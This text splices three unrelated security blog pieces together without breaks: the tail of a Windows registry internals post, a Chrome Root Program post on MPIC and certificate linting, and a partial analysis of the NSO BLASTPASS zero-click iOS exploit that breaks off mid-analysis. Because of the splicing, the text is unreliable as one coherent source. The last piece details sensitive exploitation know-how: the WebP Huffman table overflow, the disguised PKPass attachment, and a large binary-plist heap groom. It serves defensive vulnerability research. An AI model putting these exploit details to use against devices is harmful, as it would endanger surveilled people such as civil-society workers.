This critical structure has multiple functions.The key ones are connecting to KCB intent locks and keeping any pending state related to a given operation, both before and during the transaction commit phase.
✅
_CM_UOW_*
Auxiliary sub-structures of _CM_KCB_UOW, which store information about the temporary state of the registry associated with a specific type of transactional operation. Specifically, the four structures are: _CM_UOW_KEY_STATE_MODIFICATION, _CM_UOW_SET_SD_DATA, _CM_UOW_SET_VALUE_KEY_DATA and _CM_UOW_SET_VALUE_LIST_DATA.
✅
_CM_TRANS
A descriptor of a specific registry transaction, usually associated with a particular hive. In special cases, if operations are performed on multiple hives within a single transaction, then multiple _CM_TRANS objects may exist for it. Given the address of the _CM_TRANS object, it is possible to list all operations associated with this transaction in WinDbg using the !reg uowlist command.
✅
_CM_RM
A descriptor of a specific resource manager. It only exists if the given hive has KTM transactions enabled, and never exists for app hives or hives loaded with the REG_HIVE_NO_RM flag.
Think of this structure as being associated with one set of .blf / .regtrans-ms log files, which usually means one _CM_RM structure is assigned to one hive.The exception is system hives (e.g. SOFTWARE, SYSTEM etc.) which all share the same resource manager that exists under the CmRmSystem global variable.
Given the address of a _CM_RM object in WinDbg, you can list all associated transactions using the !reg translist command.
✅
_CM_INTENT_LOCK
This structure represents an intent lock, with two instances (KCBLock and KeyLock) residing in the KCB. Their primary function is to ensure key consistency by preventing the assignment of two different transactions that contain conflicting modifications of a key. Given the object's address, WinDbg's !reg ixlock command can display some details about it.
❌
Serialized log records
KTM transacted registry operations are logged to .blf files on disk to enable consistent state restoration in case of an unexpected shutdown during a transaction commit. The CmAddLogForAction function serializes the _CM_KCB_UOW object into a flat buffer and writes it to the log file using the CLFS interface. While the _CM_KCB_UOW structure can be found in public symbols, its serialized representation cannot. Notably, there was an information disclosure vulnerability (CVE-2023-28271) that was directly related to these structures.
❌
Rollback packet
When a client performs a non-transactional operation that modifies a key, and there's an active transaction associated with that key, the transaction must be rolled back before the operation can be executed to prevent an inconsistent state. This is achieved using a structure that contains a list of transactions to be rolled back. This structure is passed to the CmpAbortRollbackPacket function, which carries out the rollback. Although the official layout of this structure is unknown, in practice it is quite simple, consisting of three fields: the current capacity, the current fill level of the list, and a pointer to a dynamically allocated array of transactions.
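Since the official layout is unknown, here is a toy Python model of the described three-field shape (capacity, fill level, transaction array); it is purely illustrative and only mimics the growth and drain behavior one would expect from such a structure:

```python
class RollbackPacket:
    """Toy model of the described layout: a capacity, a fill level, and a
    dynamically grown array of transactions to abort. Entirely illustrative;
    the real structure holds raw kernel pointers, not Python objects."""
    def __init__(self, initial_capacity: int = 4) -> None:
        self.capacity = initial_capacity
        self.count = 0
        self.transactions: list[object] = [None] * initial_capacity

    def add(self, trans: object) -> None:
        if self.count == self.capacity:
            # Grow the backing array when the fill level reaches capacity.
            self.capacity *= 2
            self.transactions.extend(
                [None] * (self.capacity - len(self.transactions)))
        self.transactions[self.count] = trans
        self.count += 1

    def abort_all(self) -> list[object]:
        """Roughly the set CmpAbortRollbackPacket would iterate over."""
        aborted, self.count = self.transactions[: self.count], 0
        return aborted
```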
Differencing hives (VRegDriver)
In PDB
Structure name
Description
❌
IOCTL input structures
The VRegDriver module works by creating the \Device\VRegDriver device, and communicates with its clients by supporting nine distinct IOCTLs within the corresponding VrpIoctlDeviceDispatch handler function. These IOCTLs, exclusively accessible to administrator users, facilitate loading and unloading differencing hives, configuring registry redirections for specific containers, and a few other operations. Each IOCTL requires a specific input data structure, none of which are officially documented. Therefore, practical use of this interface necessitates reverse engineering the required structures to understand their initialization. An example of a reversed structure, corresponding to IOCTL 0x220008 and provisionally named VRP_LOAD_DIFFERENCING_HIVE_INPUT, was showcased in blog post #4. This enabled the creation of a proof-of-concept exploit for a differencing hive vulnerability (CVE-2023-36404), demonstrating the ability to load custom hives and, consequently, expose the flaw.
❌
Silo context
This silo-specific context structure is set by the VRegDriver during silo initialization using the PsInsertPermanentSiloContext function. It is later retrieved by PsGetPermanentSiloContext and used during both IOCTL handling and path translation for containerized processes. A brief analysis suggests that it primarily contains the GUID of the associated silo, a push lock used for synchronization, and a user-configured list of namespaces for the given container, i.e. a set of source and target paths between which redirection should occur.
❌
Key context
This structure stores the context specific to a particular key being subject to path translation within a silo. It is usually allocated for each key opened within the context of a containerized process, and assigned to its key body using the CmSetCallbackObjectContext API. It primarily stores the original, pre-translation path of the key (the path the client believes it is accessing) and several other auxiliary fields.
❌
Callback context (open/create)
The callback-specific context structure stores data shared between the "pre" and "post" callbacks for a given operation. This context is generally accessed through the CallContext field within the REG_*_INFORMATION structure relevant to the specific operation. In practice, VRegDriver only has one instance of a special structure defined for this purpose, used when handling the RegNtPreCreateKeyEx/RegNtPreOpenKeyEx callbacks. It saves specific data (RootObject, CompleteName, RemainingName) before the open/create request, in order to restore their original values in the "post" callback.
❌
Extra parameter
This structure also appears to be used for temporarily storing the original key path during translation. However, its scope encompasses the entire key creation/opening process, rather than just a single callback. This means it can store information across callbacks, even when symbolic links or write-through hives are encountered during path traversal, causing the CmpParseKey function to return STATUS_REPARSE or STATUS_REPARSE_GLOBAL and restart the path lookup process. Although the concept of a whole-operation context seems broadly applicable, currently there is only one type of "extra parameter" in use, represented by the GUID VRP_ORIGINAL_KEY_NAME_PARAMETER_GUID {85b8669a-cfbb-4ac0-b689-6daabfe57722}.
Layered keys
In PDB
Structure name
Description
✅
_CM_KCB_LAYER_INFO
This is likely the only structure related to layered keys whose definition is public. It is part of every KCB and contains information about the placement of the key in the global, "vertical" tree of layered key instances. In practice, this means that it stores a pointer to the KCB one level lower (its parent, so to speak), and the head of a linked list of KCBs one level higher (KCB.LayerHeight+1), if any exist.
❌
Key node stack
A stack containing all instances of a given layered key, starting from its own level all the way down to level zero (the base key). Each key in this structure is represented by a (Hive, KeyCell) pair. If the key actually exists at a given level (KeyCell ≠ -1, indicating a state other than Merge-Unbacked), it is also represented by a direct, resolved pointer to its _CM_KEY_NODE structure.
Since Windows 10 introduced support for layered keys, many places in the code that previously identified a single key as _CM_KEY_NODE* now require passing the entire key node stack structure. This is because operations on layered keys usually require knowledge of the state of lower-level keys (e.g. their layered semantics, subkeys, values), not just the key represented by the handle used by the caller.
Places where the key node stack structure is used can be identified by calls to its related helper functions, such as those for initialization (CmpInitializeKeyNodeStack) and cleanup (CmpCleanupKeyNodeStack), as well as any others containing the string "KeyNodeStack".
❌
KCB stack
This structure, analogous to the key node stack, represents keys using KCBs. Its use is most clearly revealed by references to the CmpStartKcbStack and CmpStartKcbStackForTopLayerKcb functions in code, though many other internal routines with "KcbStack" in their names also operate on it.
Both the KCB stack and the key node stack share an optimization where the first two levels are stored inline, with additional levels allocated in kernel pools only when necessary. This is likely because most systems, even those with layered keys, typically only use one level of nesting (two levels total). Thus, this optimization avoids costly memory allocation and deallocation in these common scenarios.
❌
Enum stack
This data structure allows for the enumeration of subkeys within a given layered key. Its primary use is within the CmpEnumerateLayeredKey function, which serves as the handler for the NtEnumerateKey operation specifically for layered keys. At an even higher level, this corresponds to the RegEnumKeyExW API function. The complexity of this structure is evident from the fact that there are 19 internal helper functions, all starting with the name CmpKeyEnumStack, that operate on it.
❌
Enum resume context
This data structure, directly tied to subkey enumeration, primarily serves as an optimization mechanism. After executing a specific number (N) of enumeration steps, it stores the internal state of the enum stack. This allows a subsequent request for subkey N+1 to resume the enumeration process from the previous point, bypassing the need to repeat the initial steps. Linked to a specific handle, it is stored within _CM_KEY_BODY.EnumerationResumeContext.
The KCB.SequenceNumber field, directly related to this structure, tracks whether a given key has significantly changed since a previous point in time. This enables the CmpKeyEnumStackVerifyResumeContext helper function to determine whether the current registry state is consistent enough for the existing enumeration resume context to be used for further enumeration, or whether the entire process needs to be restarted.
❌
Value enum stack
This data structure, used to enumerate the values of layered keys, is comparable in complexity to the structures used to list subkeys. The main function utilizing it is CmEnumerateValueFromLayeredKey. Additionally, there are 10 helper functions named CmpValueEnumStack[...] that operate on this structure.
❌
Sorted value enum stack
The structure is similar to the standard value enum stack, but is used to iterate over the values of a given layered key while preserving lexicographical order. Helper functions from the CmpSortedValueEnumStack[...] family (9 in total) correspond to this structure. This functionality is used exclusively in the CmpGetValueCountForKeyNodeStack function, which is responsible for returning the number of values for a given key.
The reason for the existence of this mechanism in parallel with the regular "value enum stack" is not entirely clear, but I suspect it serves as an optimization for value counting operations. This is supported by the fact that while layered keys first appeared in Windows 10 1607 (Redstone, build 14393), the sorted value enum stack was not introduced until the later Windows 10 1703 (Redstone 2, build 15063). In the first iteration of the layered key implementation, CmpGetValueCountForKeyNodeStack was implemented using the standard value enum stack. This lends credibility to the hypothesis that the two mechanisms are functionally equivalent, but the "sorted" version is faster at counting unique values when direct access to them is not required.
❌
Subtree enumerator
This structure enables the enumeration of both the direct subkeys of a layered key and all of its deeper descendants. It is relatively complex, and its associated functions begin with CmpSubtreeEnumerator[...] (also 9 in total). This mechanism is primarily needed to implement the "rename" operation on layered keys. First, it allows verification that the caller has KEY_READ and DELETE permissions for all descendant keys in the subtree, and second, it enables setting the LayerSemantics value for these descendants to Supersede-Tree (0x3).
❌
Discard/replace context
This data structure is employed during key deletion to ensure that KCB structures corresponding to higher-level Merge-Unbacked keys reliant on the deleted key are also marked as deleted. Subsequently, "fresh" KCB objects representing the non-existent key are inserted into the tree in their place. The two primary functions associated with this mechanism are CmpPrepareDiscardAndReplaceKcbAndUnbackedHigherLayers and CmpCommitDiscardAndReplaceKcbAndUnbackedHigherLayers.
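Before moving on, the enum resume context described earlier can be made more concrete with a toy Python model (entirely illustrative; the names and logic are mine, not the kernel's): cache the position reached after N steps, and invalidate the cache with a sequence number that is bumped whenever the key changes significantly.

```python
class ResumeContext:
    """Cached enumeration position plus the sequence number it was
    captured under. Purely a conceptual model of the optimization."""
    def __init__(self) -> None:
        self.index = None
        self.sequence = None

class Key:
    def __init__(self, subkeys):
        self.subkeys = list(subkeys)
        self.sequence_number = 0
        self.steps = 0  # counts enumeration work actually performed

    def enumerate(self, n, ctx):
        start = 0
        if (ctx.sequence == self.sequence_number
                and ctx.index is not None and ctx.index <= n):
            start = ctx.index          # resume from the cached position
        for _ in range(start, n + 1):  # simulate the per-step walk
            self.steps += 1
        ctx.index, ctx.sequence = n + 1, self.sequence_number
        return self.subkeys[n]
```

Requesting subkey N+1 right after subkey N then costs one step instead of N+2, while any change to the key forces a full restart.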
Conclusion
The goal of this post was to provide a thorough overview of the structures used in the Configuration Manager subsystem in Windows, with particular emphasis on the most important and frequently used ones, i.e. those describing hives and keys. I wanted to share this knowledge because there are not many publicly available sources that accurately describe the registry's operation from the implementation side, especially with regard to the most recent code developments in Windows 10 and 11. I would also like to once again use this opportunity to appeal to Microsoft to make more information available through public PDB symbols – this would greatly facilitate the work of security researchers in the future.
This post concludes the part of the series focusing solely on the inner workings of the registry. In the next, seventh installment, we will shift our perspective and examine the registry's role in the overall security of the system, with a deep focus on vulnerability research. Stay tuned!
Posted by Chrome Root Program, Chrome Security Team
The Chrome Root Program launched in 2022 as part of Google’s ongoing commitment to upholding secure and reliable network connections in Chrome. We previously described how the Chrome Root Program keeps users safe, and described how the program is focused on promoting technologies and practices that strengthen the underlying security assurances provided by Transport Layer Security (TLS). Many of these initiatives are described on our forward-looking, public roadmap named “Moving Forward, Together.”
At a high-level, “Moving Forward, Together” is our vision of the future. It is non-normative and considered distinct from the requirements detailed in the Chrome Root Program Policy. It’s focused on themes that we feel are essential to further improving the Web PKI ecosystem going forward, complementing Chrome’s core principles of speed, security, stability, and simplicity. These themes include:
Encouraging modern infrastructures and agility
Focusing on simplicity
Promoting automation
Reducing mis-issuance
Increasing accountability and ecosystem integrity
Streamlining and improving domain validation practices
Preparing for a "post-quantum" world
Earlier this month, two “Moving Forward, Together” initiatives became required practices in the CA/Browser Forum Baseline Requirements (BRs). The CA/Browser Forum is a cross-industry group that works together to develop minimum requirements for TLS certificates. Ultimately, these new initiatives represent an improvement to the security and agility of every TLS connection relied upon by Chrome users.
If you’re unfamiliar with HTTPS and certificates, see the “Introduction” of this blog post for a high-level overview.
Multi-Perspective Issuance Corroboration
Before issuing a certificate to a website, a Certification Authority (CA) must verify the requestor legitimately controls the domain whose name will be represented in the certificate. This process is referred to as "domain control validation" and there are several well-defined methods that can be used. For example, a CA can specify a random value to be placed on a website, and then perform a check to verify the value’s presence has been published by the certificate requestor.
Despite the existing domain control validation requirements defined by the CA/Browser Forum, peer-reviewed research authored by the Center for Information Technology Policy (CITP) of Princeton University and others highlighted the risk of Border Gateway Protocol (BGP) attacks and prefix-hijacking resulting in fraudulently issued certificates. This risk was not merely theoretical, as it was demonstrated that attackers successfully exploited this vulnerability on numerous occasions, with just one of these attacks resulting in approximately $2 million of direct losses.
Multi-Perspective Issuance Corroboration (referred to as "MPIC") enhances existing domain control validation methods by reducing the likelihood that routing attacks can result in fraudulently issued certificates. Rather than performing domain control validation and authorization from a single geographic or routing vantage point, which an adversary could influence as demonstrated by security researchers, MPIC implementations perform the same validation from multiple geographic locations and/or Internet Service Providers. This has been observed as an effective countermeasure against ethically conducted, real-world BGP hijacks.
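Conceptually, MPIC can be sketched as running the same check from several perspectives and requiring corroboration before issuance. The quorum rule below is illustrative only, not the actual Baseline Requirements thresholds:

```python
def corroborated(check, vantage_points, max_failures=1):
    """Minimal sketch of multi-perspective corroboration: run the same
    domain-control check from several network perspectives, and treat
    validation as successful only if at most `max_failures` of them
    disagree. The quorum rule here is illustrative, not the BR one."""
    results = [check(vp) for vp in vantage_points]
    return any(results) and results.count(False) <= max_failures

# An attacker who hijacks routes near one vantage point can make a fake
# record visible there, but the other perspectives still see the real
# zone, so corroboration fails and issuance is refused.
attacker_visible = {"us-east"}
assert not corroborated(lambda vp: vp in attacker_visible,
                        ["us-east", "eu-west", "ap-south"])
```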
The Chrome Root Program led a work team of ecosystem participants, which culminated in a CA/Browser Forum Ballot to require adoption of MPIC via Ballot SC-067. The ballot received unanimous support from organizations who participated in voting. Beginning March 15, 2025, CAs issuing publicly-trusted certificates must now rely on MPIC as part of their certificate issuance process. Some of these CAs are relying on the Open MPIC Project to ensure their implementations are robust and consistent with ecosystem expectations.
We’d especially like to thank Henry Birge-Lee, Grace Cimaszewski, Liang Wang, Cyrill Krähenbühl, Mihir Kshirsagar, Prateek Mittal, Jennifer Rexford, and others from Princeton University for their sustained efforts in promoting meaningful web security improvements and ongoing partnership.
Linting
Linting refers to the automated process of analyzing X.509 certificates to detect and prevent errors, inconsistencies, and non-compliance with requirements and industry standards. Linting ensures certificates are well-formatted and include the necessary data for their intended use, such as website authentication.
Linting can expose the use of weak or obsolete cryptographic algorithms and other known insecure practices, improving overall security. Linting improves interoperability and helps CAs reduce the risk of non-compliance with industry standards (e.g., CA/Browser Forum TLS Baseline Requirements). Non-compliance can result in certificates being "mis-issued". Detecting these issues before a certificate is in use by a site operator reduces the negative impact associated with having to correct a mis-issued certificate.
There are numerous open-source linting projects in existence (e.g., certlint, pkilint, x509lint, and zlint), in addition to numerous custom linting projects maintained by members of the Web PKI ecosystem. “Meta” linters, like pkimetal, combine multiple linting tools into a single solution, offering simplicity and significant performance improvements to implementers compared to implementing multiple standalone linting solutions.
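To give a flavor of what such checks look like, here is a toy lint pass over a pre-parsed certificate represented as a plain dict (a stand-in for a real X.509 parser; real linters such as zlint parse DER and encode hundreds of checks like these against the Baseline Requirements):

```python
def lint(cert):
    """Toy linter over a hypothetical pre-parsed certificate dict.
    Each rule mirrors a real Baseline Requirements constraint."""
    findings = []
    if cert["validity_days"] > 398:
        findings.append("validity exceeds 398 days")
    if cert["key_bits"] < 2048:
        findings.append("RSA key smaller than 2048 bits")
    if not cert["subject_alt_names"]:
        findings.append("no subjectAltName present")
    if cert["signature_algorithm"] in {"sha1WithRSAEncryption",
                                       "md5WithRSAEncryption"}:
        findings.append("weak signature algorithm")
    return findings
```

Running a pass like this before issuance is exactly what lets a CA catch a mis-issuance before the certificate ever reaches a site operator.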
Last spring, the Chrome Root Program led ecosystem-wide experiments, emphasizing the need for linting adoption due to the discovery of widespread certificate mis-issuance. We later participated in drafting CA/Browser Forum Ballot SC-075 to require adoption of certificate linting. The ballot received unanimous support from organizations who participated in voting. Beginning March 15, 2025, CAs issuing publicly-trusted certificates must now rely on linting as part of their certificate issuance process.
What’s next?
We recently landed an updated version of the Chrome Root Program Policy that further aligns with the goals outlined in “Moving Forward, Together.” The Chrome Root Program remains committed to proactive advancement of the Web PKI. This commitment was recently realized in practice through our proposal to sunset demonstrably weak domain control validation methods permitted by the CA/Browser Forum TLS Baseline Requirements. The weak validation methods in question are now prohibited beginning July 15, 2025.
It’s essential we all work together to continually improve the Web PKI, and reduce the opportunities for risk and abuse before measurable harm can be realized. We continue to value collaboration with web security professionals and the members of the CA/Browser Forum to realize a safer Internet. Looking forward, we’re excited to explore a reimagined Web PKI and Chrome Root Program with even stronger security assurances for the web as we navigate the transition to post-quantum cryptography. We’ll have more to say about quantum-resistant PKI later this year.
On September 7, 2023 Apple issued an out-of-band security update for iOS:
Around the same time on September 7th 2023, Citizen Lab published a blog post linking the two CVEs fixed in iOS 16.6.1 to an "NSO Group Zero-Click, Zero-Day exploit captured in the wild":
"[The target was] an individual employed by a Washington DC-based civil society organization with international offices...
The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the victim.
The exploit involved PassKit attachments containing malicious images sent from an attacker iMessage account to the victim."
The day before, on September 6th 2023, Apple reported a vulnerability to the WebP project, indicating in the report that they planned to ship a custom fix for Apple customers the next day.
The WebP team posted their first proposed fix in the public git repo the next day, and five days after that on September 12th Google released a new Chrome stable release containing the WebP fix. Both Apple and Google marked the issue as exploited in the wild, alerting other integrators of WebP that they should rapidly integrate the fix as well as causing the security research community to take a closer look...
A couple of weeks later on September 21st 2023, former Project Zero team lead Ben Hawkes (in collaboration with @mistymntncop) published the first detailed writeup of the root cause of the vulnerability on the Isosceles Blog. A couple of months later, on November 3rd, a group called Dark Navy published their first blog post: a two-part analysis (Part 1 - Part 2) of the WebP vulnerability and a proof-of-concept exploit targeting Chrome (CVE-2023-4863).
Whilst the Isosceles and Dark Navy posts explained the underlying memory corruption vulnerability in great detail, they were unable to solve another fascinating part of the puzzle: just how exactly do you land an exploit for this vulnerability in a one-shot, zero-click setup? As we'll soon see, the corruption primitive is very limited. Without access to the samples it was almost impossible to know.
In mid-November, in collaboration with Amnesty International Security Lab, I was able to obtain a number of BLASTPASS PKPass sample files as well as crash logs from failed exploit attempts.
This blog post covers my analysis of those samples and the journey to figure out how one of NSO's recent zero-click iOS exploits really worked. For me that journey began by immediately taking three months of paternity leave, and resumed in March 2024 where this story begins:
Setting the scene
For a detailed analysis of the root-cause of the WebP vulnerability and the primitive it yields, I recommend first reading the three blog posts I mentioned earlier (Isosceles, Dark Navy 1, Dark Navy 2.) I won't restate their analyses here (both because you should read their original work, and because it's quite complicated!) Instead I'll briefly discuss WebP and the corruption primitive the vulnerability yields.
WebP
WebP is a relatively modern image file format, first released in 2010. In reality WebP is actually two completely distinct image formats: a lossy format based on the VP8 video codec and a separate lossless format. The two formats share nothing apart from both using a RIFF container and the string WEBP for the first chunk name. From that point on (12 bytes into the file) they are completely different. The vulnerability is in the lossless format, with the RIFF chunk name VP8L.
Lossless WebP makes extensive use of Huffman coding; there are at least 10 Huffman trees present in the BLASTPASS sample. In the file they're stored as canonical Huffman trees, meaning that only the code lengths are retained. At decompression time those lengths are converted directly into a two-level Huffman decoding table, with the five largest tables all getting squeezed together into the same pre-allocated buffer. The (it turns out not quite) maximum size of these tables is pre-computed based on the number of symbols they encode. If you're up to this part and you're slightly lost, the other three blogposts referenced above explain this in detail.
With control over the symbol lengths it's possible to define all sorts of strange trees, many of which aren't valid. The fundamental issue was that the WebP code only checked the validity of the tree after building the decoding table. But the pre-computed size of the decoding table was only correct for valid trees.
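This validity condition can be stated with the Kraft equality: the code lengths of a complete prefix code satisfy sum(2^-l) = 1, while oversubscribed lengths exceed it. A small check, assuming nothing beyond the standard canonical-Huffman definition:

```python
from fractions import Fraction

def kraft_sum(code_lengths):
    """Sum of 2**-l over the used (non-zero) code lengths. A complete
    canonical Huffman tree sums to exactly 1; anything above 1 is
    oversubscribed and cannot form a valid tree, which is the condition
    the WebP code only checked after building the decoding table."""
    return sum(Fraction(1, 2 ** l) for l in code_lengths if l > 0)

# Complete tree: lengths 1, 2, 3, 3 fill the code space exactly.
assert kraft_sum([1, 2, 3, 3]) == 1
# Oversubscribed: three codes of length 1 cannot fit into one bit.
assert kraft_sum([1, 1, 1]) > 1
```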
As the Isosceles blog post points out, this means a fundamental part of the vulnerability is that triggering the bug is always detected (though only after memory has been corrupted), and image parsing stops just a few lines of code later. This presents another exploitation mystery: in a zero-click context, how do you exploit a bug where every time the issue is triggered it also stops the parsing of any attacker-controlled data?
The second mystery involves the actual corruption primitive. The vulnerability will write a HuffmanCode structure at a known offset past the end of the huffman tables buffer:
// Huffman lookup table entry
typedef struct {
uint8_t bits;
uint16_t value;
} HuffmanCode;
As DarkNavy point out, whilst the bits and value fields are nominally attacker-controlled, in reality there isn't that much flexibility. The fifth huffman table (the one at the end of the preallocated buffer, part of which can get written out-of-bounds) only has 40 symbols, limiting value to at most 39 (0x27), and bits will be between 1 and 7 (for a second-level table entry). There's a padding byte between bits and value which makes the largest value that could be written out-of-bounds 0x00270007. And it just so happens that that's exactly the value which the exploit does write — and they likely didn't have that much choice about it.
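The layout arithmetic is easy to verify: with natural alignment, bits sits at offset 0, a compiler-inserted padding byte at offset 1, and value at offsets 2 and 3, so packing the maximum reachable field values reproduces the out-of-bounds dword:

```python
import struct

# HuffmanCode under natural alignment: uint8_t bits at offset 0, one
# byte of compiler padding, uint16_t value at offsets 2-3 (4 bytes
# total). Packing the maximum reachable field values reproduces the
# dword that ends up out of bounds.
raw = struct.pack("<BxH", 7, 0x27)   # bits=7, pad byte, value=0x27
oob_dword = struct.unpack("<I", raw)[0]
assert oob_dword == 0x00270007
```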
There's also not much flexibility in the huffman table allocation size. The table allocation in the exploit is 12072 (0x2F28) bytes, which will get rounded up to fit within a 0x3000 byte libmalloc small region. The code lengths are chosen such that the overflow occurs like this:
To summarize: The 32-bit value 0x270007 will be written 0x58 bytes past the end of a 0x3000 byte huffman table allocation. And then WebP parsing will fail, and the decoder will bail out.
Déjà vu?
Long-term readers of the Project Zero blog might be experiencing a sense of déjà vu at this point... haven't I already written a blog post about an NSO zero-click iPhone zero day exploiting a vulnerability in a slightly obscure lossless compression format used in an image parsed from an iMessage attachment?
BLASTPASS has many similarities with FORCEDENTRY, and my initial hunch (which turned out to be completely wrong) was that this exploit might take a similar approach to build a weird machine using some fancier WebP features. To that end I started out by writing a WebP parser to see what features were actually used.
Transformation
In a very similar fashion to JBIG2, WebP also supports invertible transformations on the input pixel data:
My initial theory was that the exploit might operate in a similar fashion to FORCEDENTRY and apply sequences of these transformations outside of the bounds of the image buffer to build a weird machine. But after implementing enough of the WebP format in Python to parse every bit of the VP8L chunk it became pretty clear that it was only triggering the Huffman table overflow and nothing more. The VP8L chunk was only 1052 bytes, and pretty much all of it was the 10 Huffman tables needed to trigger the overflow.
What's in a pass?
Although BLASTPASS is often referred to as an exploit for "the WebP vulnerability", the attackers don't actually just send a WebP file (even though that is supported in iMessage). They send a PassKit PKPass file, which contains a WebP. There must be a reason for this. So let's step back and actually take a look at one of the sample files I received:
171K sample.pkpass
$ file sample.pkpass
sample.pkpass: Zip archive data, at least v2.0 to extract, compression method=deflate
There are five files inside the PKPass zip archive:
60K background.png
5.5M logo.png
175B manifest.json
18B pass.json
3.3K signature
The 5.5MB logo.png is the WebP image, just with a .png extension instead of .webp:
$ file logo.png
logo.png: RIFF (little-endian) data, Web/P image
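As the file(1) output shows, identification rests on magic bytes rather than the file extension; a minimal sniffer for the three formats involved here (roughly what both file(1) and ImageIO's own format detection do):

```python
def sniff(data: bytes) -> str:
    """Identify a file by magic bytes rather than extension, roughly
    what file(1) and, importantly, ImageIO's format detection do."""
    if data[:4] == b"RIFF" and data[8:12] == b"WEBP":
        return "webp"
    if data[:8] == b"\x89PNG\r\n\x1a\n":
        return "png"
    if data[:4] in (b"II*\x00", b"MM\x00*"):   # little/big-endian TIFF
        return "tiff"
    return "unknown"
```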
The closest thing to a specification for the PKPass format appears to be the Wallet Developer Guide, and whilst it doesn't explicitly state that the .png files should actually be Portable Network Graphics images, that's presumably the intention. This is yet another parallel with FORCEDENTRY, where a similar trick was used to reach the PDF parser when attempting to parse a GIF.
PKPass files require a valid signature which is contained in manifest.json and signature. The signature has a presumably fake name and more timestamps indicating that the PKPass is very likely being generated and signed on the fly for each exploit attempt.
Curious. The background.png is another file with a misleading extension; this time a TIFF file with a .png extension.
We'll return to this TIFF later in the analysis as it plays a critical role in the exploit flow, but for now we'll focus on the WebP, with one short diversion:
Blastdoor
So far I've only mentioned the WebP vulnerability, but the Apple advisory I linked at the start of this post mentions two separate CVEs:
The first, CVE-2023-41064 in ImageIO, is the WebP bug (though, just to keep things confusing, under a different CVE from the upstream WebP fix, which is CVE-2023-4863; they're the same vulnerability).
The second, CVE-2023-41061 in "Wallet", is described in the Apple advisory as: "A maliciously crafted attachment may result in arbitrary code execution".
"Citizen Lab called this attack "BLASTPASS", since the attackers found a clever way to bypass the "BlastDoor" iMessage sandbox. We don't have the full technical details, but it looks like by bundling an image exploit in a PassKit attachment, the malicious image would be processed in a different, unsandboxed process. This corresponds to the first CVE that Apple released, CVE-2023-41061."
This theory makes sense — FORCEDENTRY had a similar trick where the JBIG2 bug was actually exploited inside IMTranscoderAgent instead of the more restrictive sandbox of BlastDoor. But in all my experimentation, as well as all the in-the-wild crash logs I've seen, this hypothesis doesn't seem to hold.
The PKPass file and the images enclosed within do get parsed inside the BlastDoor sandbox and that's where the crashes occur or the payload executes — later on we'll also see evidence that the NSExpression payload which eventually gets evaluated expects to be running inside BlastDoor.
My guess is that CVE-2023-41061 is more likely referring to the lax parsing of PKPasses which didn't reject images which weren't PNGs.
In late 2024, I received another set of in-the-wild crash logs including two which do in fact strongly indicate that there was also a path to hit the WebP vulnerability in the MobileSMS process, outside the BlastDoor sandbox! Interestingly, the timestamps indicate that these devices were targeted in November 2023, two months after the vulnerability was patched.
In those cases the WebP code was reached inside the MobileSMS process via a ChatKitCKPassPreviewMediaObject created by a CKAttachmentMessagePartChatItem.
What's in a WebP?
I mentioned that the VP8L chunk in the WebP file is only around 1KB. Yet in the file listing above the WebP file is 5.5MB! So what's in the rest of it? Expanding out my WebP parser we see that there's one more RIFF chunk:
EXIF : 0x586bb8
exif is Intel byte alignment
EXIF has n_entries=1
tag=8769 fmt=4 n_components=1 data=1a
subIFD has n_entries=1
tag=927c fmt=7 n_components=586b8c data=2c
It's a (really really huge) EXIF - the standard format which cameras use to store image metadata — stuff like the camera model, exposure time, f-stop etc.
It's a tag-based format and pretty much all 5.5MB is inside one tag with the id 0x927c. So what's that?
Looking through an online list of EXIF tags just below the lens FocalLength tag and above the UserComment tag we spot 0x927c:
It's the very-vague-yet-fascinating sounding: "MakerNote - Manufacturer specific information."
"the "MakerNote" tag contains information normally in a proprietary binary format."
Modifying the WebP parser to also dump out the MakerNote tag we see:
$ file sample.makernote
sample.makernote: Apple binary property list
Apple's chosen format for the "proprietary binary format" is binary plist!
And indeed: looking through the ImageIO library in IDA there's a clear path between the WebP parser, the EXIF parser, the MakerNote parser and the binary plist parser.
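That extraction path can be reproduced outside ImageIO. Here's a minimal Python sketch (matching the tooling used elsewhere in this analysis) which detects and parses a binary plist embedded in a MakerNote payload; the sample payload below is a stand-in, not the real exploit bplist:

```python
import plistlib

def parse_makernote_bplist(blob: bytes):
    # Apple binary plists start with the 8-byte magic "bplist00".
    if blob[:8] != b"bplist00":
        raise ValueError("MakerNote payload is not a binary plist")
    return plistlib.loads(blob)

# Stand-in MakerNote payload; the real one is the 5.5MB groom bplist.
payload = plistlib.dumps({"groom": [b"A" * 16]}, fmt=plistlib.FMT_BINARY)
parsed = parse_makernote_bplist(payload)
assert parsed == {"groom": [b"A" * 16]}
```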
unbplisting
I covered the binary plist format in a previous blog post. That was the second time I'd had to analyse a large bplist. The first time (for the FORCEDENTRY sandbox escape) it was possible mostly by hand, just using the human-readable output of plutil. Last year, for the Safari sandbox escape analysis, the bplist was 437KB and I had to write a custom bplist parser to figure out what was going on. Keeping the exponential curve going this year the bplist was 10x larger again.
In this case it's fairly clear that the bplist must be a heap groom - and at 5.5MB, presumably a fairly complicated one. So what's it doing?
Switching Views
I had a hunch that the bplist would use duplicate dictionary keys as a fundamental building block for the heap groom, but running my parser it didn't output any... until I realised that my tool stored the parsed dictionaries directly as Python dictionaries before dumping them. Fixing the tool to instead keep lists of keys and values, it became clear that there were duplicate keys, and lots of them.
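The pitfall is easy to demonstrate. A sketch of the difference between storing parsed entries as a Python dict versus as parallel key/value lists:

```python
# Two entries with the same key, as a duplicate-key bplist dictionary
# would produce them (the values here are illustrative).
pairs = [("spray", b"A" * 0x3FF), ("spray", b"B" * 0x3FF)]

# A Python dict silently collapses duplicates: only the last value survives.
as_dict = dict(pairs)
assert len(as_dict) == 1

# Keeping lists of keys and values preserves the duplicates.
keys = [k for k, _ in pairs]
values = [v for _, v in pairs]
assert keys.count("spray") == 2 and len(values) == 2
```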
In the Safari exploit writeup I described how I used different visualisation techniques to try to explore the structure of the objects, looking for patterns I could use to simplify what was going on. In this case, modifying the parser to emit well-formed curly brackets and indentation then relying on VS Code's automatic code-folding proved to work well enough for browsing around and getting a feel for the structure of the groom object.
Sometimes the right visualisation technique is sufficient to figure out what the exploit is trying to do. In this case, where the primitive is a heap-based buffer overflow, the groom will inevitably try to put two things next to each other in memory and I want to know "what two things?"
But no matter how long I stared and scrolled, I couldn't figure anything out. Time to try something different.
Instrumentation
I wrote a small helper to load the bplist using the same API as the MakerNote parser and ran it using the Mac Instruments app:
